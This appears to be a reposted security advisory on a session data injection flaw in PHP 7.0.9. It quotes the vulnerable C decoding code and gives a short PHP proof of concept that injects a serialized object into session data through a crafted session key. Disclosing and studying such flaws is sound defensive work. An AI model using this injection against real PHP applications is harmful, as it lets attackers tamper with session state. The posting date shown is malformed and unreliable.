PHP 7.0.9 Session Data Injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>PHP 7.0.9 Session Data Injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Description: ------------ PHP Session Data Injection Vulnerability ``` PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */ { ... while (p < endptr) { zval **tmp; q = p; while (*q != PS_DELIMITER) { if (++q >= endptr) goto break_outer_loop; } if (p[0] == PS_UNDEF_MARKER) { p++; has_value = 0; } else { has_value = 1; } namelen = q - p; name = estrndup(p, namelen); q++; if (zend_hash_find(&EG(symbol_table), name, namelen + 1, (void **) &tmp) == SUCCESS) { if ((Z_TYPE_PP(tmp) == IS_ARRAY && Z_ARRVAL_PP(tmp) == &EG(symbol_table)) || *tmp == PS(http_session_vars)) { goto skip; } } ... skip: efree(name); p = q; } ``` If the session name is not allowed, then session php handler will ignore and skip the name, and continue to parsing. This means that if an attacker can control the session name, then he will be able to inject arbitrarily session data. The similar issue also exist in session php_binary handler. PoC: ``` <?php ini_set('session.serialize_handler', 'php'); session_start(); $_SESSION['_SESSION'] = 'ryat|O:8:"stdClass":0:{}'; session_write_close(); session_start(); var_dump($_SESSION); ?> ``` </BODY></HTML>